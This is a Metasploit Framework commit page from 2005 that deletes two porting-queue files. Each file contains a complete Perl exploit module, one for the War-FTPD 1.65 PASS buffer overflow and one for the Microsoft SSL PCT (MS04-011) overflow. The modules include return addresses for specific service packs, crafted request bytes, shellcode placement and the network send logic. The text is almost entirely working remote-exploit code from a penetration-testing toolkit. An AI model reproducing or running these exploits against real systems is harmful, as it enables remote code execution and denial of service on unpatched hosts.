dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Watftpd is not going to make it 

SSL ported


git-svn-id: file:///home/svn/incoming/trunk@3127 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2005-11-26 16:42:41 +00:00
parent e2ab431a57
commit ab597b4172
2 changed files with 0 additions and 414 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

178
dev/porting/queue/warftpd_165_pass.rb
View File

@ -1,178 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'War-FTPD 1.65 PASS Overflow',
'Description' => %q{
This exploits the buffer overflow found in the PASS command
in War-FTPD 1.65. This particular module will only work
reliably against Windows 2000 targets. The server must be
configured to allow anonymous logins for this exploit to
succeed. A failed attempt will bring down the service
completely.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '875'],
[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html'],
[ 'MIL', '74'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, win2000',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Mar 19 1998',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::warftpd_165_pass;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'War-FTPD 1.65 PASS Overflow',
'Version' => '$Revision$',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00+&=%\x0a\x0d\x20",
},
'Description' => Pex::Text::Freeform(qq{
This exploits the buffer overflow found in the PASS command
in War-FTPD 1.65. This particular module will only work
reliably against Windows 2000 targets. The server must be
configured to allow anonymous logins for this exploit to
succeed. A failed attempt will bring down the service
completely.
}),
'Refs' =>
[
['OSVDB', '875'],
['URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html'],
['MIL', '74'],
],
'DefaultTarget' => 0,
'Targets' => [ ["Windows 2000"] ],
'Keys' => ['warftpd'],
'DisclosureDate' => 'Mar 19 1998',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $request = ("META" x 1024);
# this return address is a jmp ebx in the included MFC42.DLL
substr($request, 562, 4, pack("V", 0x5f4e772b));
substr($request, 558, 4, "\xeb\x08\xeb\x08");
substr($request, 566, length($shellcode), $shellcode);
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $r = $s->Recv(-1, 20);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->PrintLine("[*] REMOTE> $r");
$r = $s->Recv(-1, 10);
$s->Send("USER ANONYMOUS\n");
$r = $s->Recv(-1, 20);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->PrintLine("[*] REMOTE> $r");
$s->Send("PASS $request\n");
$r = $s->Recv(-1, 20);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->PrintLine("[*] REMOTE> $r");
return;
}
=end
end
end

236
dev/porting/queue/windows_ssl_pct.rb
View File

@ -1,236 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SSL PCT MS04-011 Overflow',
'Description' => %q{
This module exploits a buffer overflow in the Microsoft
Windows SSL PCT protocol stack. This code is based on Johnny
Cyberpunk's THC release and has been tested against Windows
2000 and Windows XP. To use this module, specify the remote
port of any SSL service, or the port and protocol of an
application that uses SSL. The only application protocol
supported at this time is SMTP. You only have one chance to
select the correct target, if you are attacking IIS, you may
want to try one of the other exploits first (WebDAV). If
WebDAV does not work, this more than likely means that this
is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS
5.1). Using the wrong target may not result in an immediate
crash of the remote system.
},
'Author' => [ 'hdm', 'Johnny Cyberpunk <jcyberpunk@thc.org> [Unknown License]' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '5250'],
[ 'MSB', 'MS04-011'],
[ 'MIL', '77'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1800,
'BadChars' => "",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, win2000, winxp',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Apr 13 2004',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::windows_ssl_pct;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Microsoft SSL PCT MS04-011 Overflow',
'Version' => '$Revision$',
'Authors' =>
[
'H D Moore <hdm [at] metasploit.com>',
'Johnny Cyberpunk <jcyberpunk [at] thc.org> [Unknown License]'
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 443],
'PROTO' => [0, 'DATA', 'The application protocol (raw or smtp)', 'raw'],
},
'Payload' =>
{
'MinNops' => 0,
'MaxNops' => 0,
'Space' => 1800,
'BadChars' => '',
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a buffer overflow in the Microsoft Windows SSL PCT
protocol stack. This code is based on Johnny Cyberpunk's THC release
and has been tested against Windows 2000 and Windows XP. To use this module,
specify the remote port of any SSL service, or the port and protocol of
an application that uses SSL. The only application protocol supported at
this time is SMTP. You only have one chance to select the correct target,
if you are attacking IIS, you may want to try one of the other exploits
first (WebDAV). If WebDAV does not work, this more than likely means that
this is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS 5.1). Using
the wrong target may not result in an immediate crash of the remote system.
}),
'Refs' =>
[
['OSVDB', '5250'],
['MSB', 'MS04-011'],
['MIL', '77'],
],
'Targets' =>
[
['Windows 2000 SP4', 0x67419ce8], # jmp [esp + 0x6c]
['Windows 2000 SP3', 0x67419e1d], # jmp [esp + 0x6c]
['Windows 2000 SP2', 0x6741a426], # jmp [esp + 0x6c]
['Windows 2000 SP1', 0x77e4f44d], # jmp [ebx + 0x14]
['Windows 2000 SP0', 0x7658a6cb], # jmp [ebx + 0x0e]
['Windows XP SP0', 0x0ffb7de9], # jmp [esp + 0x6c]
['Windows XP SP1', 0x0ffb832f], # jmp [esp + 0x6c]
['Debugging Target', 0x01020304], # -----------------
],
'Keys' => ['ssl', 'lsass'],
'DisclosureDate' => 'Apr 13 2004',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $proto = $self->GetVar('PROTO');
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
# this is a heap ptr to the ssl request
# ... and just happens to not die
# thanks to Core ST, Halvar, JohnnyC :)
#
# 80620101 => and byte ptr [esi+1], 0x2
# bd00010001 => mov ebp, 0x1000100
# 0016 => add [esi], dl
# 8f8201000000 => pop [esi+1]
# eb0f => jmp short 11 to shellcode
my $request =
"\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00".
"\xeb\x0f".'XXXXXXXXXXX'.pack('V', ($target->[1] ^ 0xffffffff)).
$shellcode;
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => 0,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $res;
# Exploit via SMTP and STARTTLS
if ($proto =~ /smtp/i) {
$res = $s->Recv(-1, 45);
$res =~ s/\r|\n//g;
$self->PrintLine("[*] REMOTE> $res");
$s->Send("HELO METASPLOIT.COM\r\n");
$res = $s->Recv(-1, 5);
$res =~ s/\r|\n//g;
$self->PrintLine("[*] REMOTE> $res");
$s->Send("STARTTLS\r\n");
$res = $s->Recv(-1, 5);
$res =~ s/\r|\n//g;
$self->PrintLine("[*] REMOTE> $res");
if ($res !~ /^220.*SMTP server ready/) {
$self->PrintLine("[*] Invalid response to STARTTLS");
return(0);
}
}
$self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
$s->Send($request);
$self->PrintLine("[*] Waiting for a response...");
$res = $s->Recv(-1, 5);
if ($res && $res eq "\x00\x00\x01") {
$self->PrintLine("[*] Response indicates that PCT is disabled");
}
return(0);
}
=end
end
end